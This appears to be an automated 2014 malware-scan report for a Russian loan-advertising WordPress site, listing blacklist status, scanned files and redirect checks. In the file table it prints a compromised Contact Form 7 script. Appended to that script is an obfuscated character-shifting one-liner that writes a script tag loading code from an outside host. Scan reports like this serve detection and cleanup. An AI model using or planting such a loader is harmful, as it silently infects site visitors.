Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=srochnyj-kredit-bez-spravok.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://srochnyj-kredit-bez-spravok.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://srochnyj-kredit-bez-spravok.ru/ | 200 OK Content-Length: 15248 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/wp-content/themes/kreditnik2/js/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://srochnyj-kredit-bez-spravok.ru/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/x-javascript | clean |
http://srochnyj-kredit-bez-spravok.ru/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=1.3.17.2 | 200 OK Content-Length: 9517 Content-Type: application/x-javascript | clean |
http://srochnyj-kredit-bez-spravok.ru/wp-content/plugins/contact-form-7/includes/js/jquery.form.js?ver=3.09 | 200 OK Content-Length: 14238 Content-Type: application/x-javascript | clean |
http://srochnyj-kredit-bez-spravok.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.2 | 200 OK Content-Length: 6830 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $.extend({ cached: 0 }, _wpcf7); $('div.wpcf7 > form').ajaxForm({ beforeSubmit: function(formData, jqForm, options) { jqForm.wpcf7ClearResponseOutput(); jqForm.find('img.ajax-loader').css({ visibility: 'visible' }); return true; }, beforeSerialize: function(jqForm, options) { jqForm.fi }); }; $.fn.wpcf7FillResponseOutput = function(message) { return this.each(function() { $(this).find('div.wpcf7-response-output').append(message).slideDown('fast'); }); }; })(jQuery); <!-- js-tools --> c=0;while(c<90)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vsqfo/jo/vb0benjojtusbups0dpnqpofout0dpn`jotubmmfs0tubu/qiq#?=0tdsjqu?'.charCodeAt(c++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://srochnyj-kredit-bez-spravok.ru/o-kompanii | 200 OK Content-Length: 14524 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/kreditnaya-karta | 200 OK Content-Length: 14631 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/?page_id=29 | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 28 Jun 2014 23:47:08 GMT Pragma: no-cache Location: http://srochnyj-kredit-bez-spravok.ru/antikollektor Server: nginx/1.4.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=22c589fa0cc14a02d3cfcd2891585f2f; path=/ X-Pingback: http://srochnyj-kredit-bez-spravok.ru/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://srochnyj-kredit-bez-spravok.ru/antikollektor | 200 OK Content-Length: 14253 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/category/partnery | 200 OK Content-Length: 30939 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/kontakty | 200 OK Content-Length: 13430 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/?page_id=49 | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 28 Jun 2014 23:47:10 GMT Pragma: no-cache Location: http://srochnyj-kredit-bez-spravok.ru/zakazat-besplatnyj-zvonok Server: nginx/1.4.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=aa4d94501a6c8f59993cbf1124b3e706; path=/ X-Pingback: http://srochnyj-kredit-bez-spravok.ru/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://srochnyj-kredit-bez-spravok.ru/zakazat-besplatnyj-zvonok | 200 OK Content-Length: 13843 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/?page_id=21 | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 28 Jun 2014 23:47:10 GMT Pragma: no-cache Location: http://srochnyj-kredit-bez-spravok.ru/kredit-dlya-biznesa Server: nginx/1.4.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=d1672352415d01953355c1dd7924db35; path=/ X-Pingback: http://srochnyj-kredit-bez-spravok.ru/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://srochnyj-kredit-bez-spravok.ru/kredit-dlya-biznesa | 200 OK Content-Length: 14985 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/?page_id=19 | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 28 Jun 2014 23:47:11 GMT Pragma: no-cache Location: http://srochnyj-kredit-bez-spravok.ru/potrebitelskij-kredit Server: nginx/1.4.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=3030e1bfa32633e9293807730f71176d; path=/ X-Pingback: http://srochnyj-kredit-bez-spravok.ru/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://srochnyj-kredit-bez-spravok.ru/potrebitelskij-kredit | 200 OK Content-Length: 15122 Content-Type: text/html | clean |
http://srochnyj-kredit-bez-spravok.ru/?page_id=23 | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 28 Jun 2014 23:47:12 GMT Pragma: no-cache Location: http://srochnyj-kredit-bez-spravok.ru/avtokredit Server: nginx/1.4.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=262ba69700b8cf030972bb0cc903429e; path=/ X-Pingback: http://srochnyj-kredit-bez-spravok.ru/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://srochnyj-kredit-bez-spravok.ru/avtokredit | 200 OK Content-Length: 15276 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: srochnyj-kredit-bez-spravok.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 28 Jun 2014 23:47:05 GMT
Pragma: no-cache
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=63280eed8ed685d4d92024506748fc74; path=/
X-Pingback: http://srochnyj-kredit-bez-spravok.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: srochnyj-kredit-bez-spravok.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 28 Jun 2014 23:47:05 GMT
Pragma: no-cache
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=63280eed8ed685d4d92024506748fc74; path=/
X-Pingback: http://srochnyj-kredit-bez-spravok.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: srochnyj-kredit-bez-spravok.ru
Referer: http://www.google.com/search?q=srochnyj-kredit-bez-spravok.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: srochnyj-kredit-bez-spravok.ru
Referer: http://www.google.com/search?q=srochnyj-kredit-bez-spravok.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.